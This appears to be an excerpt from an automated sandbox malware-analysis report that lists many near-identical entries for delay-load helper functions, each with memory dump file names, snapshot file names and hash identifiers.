                                                            Function 00BEE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 15cbead8d94cf7a60dc3343f6c22033a6bdf3456a9bd300718bb26e24e00762c
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 15cbead8d94cf7a60dc3343f6c22033a6bdf3456a9bd300718bb26e24e00762c
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: be7cc01b4b48c0151631ce5b39106d996533b8ba59c1f218ecd8877f65082800
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: be7cc01b4b48c0151631ce5b39106d996533b8ba59c1f218ecd8877f65082800
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d3b874918d707527243859aca51e0f2d9d73ea4b926c249b89bc404c8774c1bc
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: d3b874918d707527243859aca51e0f2d9d73ea4b926c249b89bc404c8774c1bc
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8a4a5045d980935fd3419ee152ed55b2b18261f4eecd28c37de217a0cfa39ebb
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 8a4a5045d980935fd3419ee152ed55b2b18261f4eecd28c37de217a0cfa39ebb
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4286c3b599ebe7cfbb974bfdad98107c453bb6b59ea46c5b531840ce384ad46a
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 4286c3b599ebe7cfbb974bfdad98107c453bb6b59ea46c5b531840ce384ad46a
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55619fe774019eb670dd77675ef3bd71e1da98761592bbf54a05881a8dece6e3
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 55619fe774019eb670dd77675ef3bd71e1da98761592bbf54a05881a8dece6e3
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f09255a3a24d9da9ff75c39f4e6455c2b52446858da22e2ba53f6395ff4236c8
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: f09255a3a24d9da9ff75c39f4e6455c2b52446858da22e2ba53f6395ff4236c8
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ac1aead11898ab9eb04e511a1cdb9d52c375776126c7f8921f5b98f5dc2615b9
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: ac1aead11898ab9eb04e511a1cdb9d52c375776126c7f8921f5b98f5dc2615b9
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            Function 00BEE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bb4975ff91ef24721df9655d5bafa79e09c4f0603f50008ee27f0d3e1f9118dd
                                                            • Instruction ID: 42cfedde031aa86d141ed6eda300bc5563c3e7b6bcabcbfaba9ed4aae902f7cb
                                                            • Opcode Fuzzy Hash: bb4975ff91ef24721df9655d5bafa79e09c4f0603f50008ee27f0d3e1f9118dd
                                                            • Instruction Fuzzy Hash: 47A012E11540813C711412021C42C37024CC0C0B10730426DF430940C06E4048045432
                                                            Function 00BEE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            Function 00BEE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            Function 00BEE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            Function 00BEE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            Function 00BEE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
                                                            • Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
                                                            • Opcode Fuzzy Hash: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
                                                            • Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432
                                                            Function 00BEE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
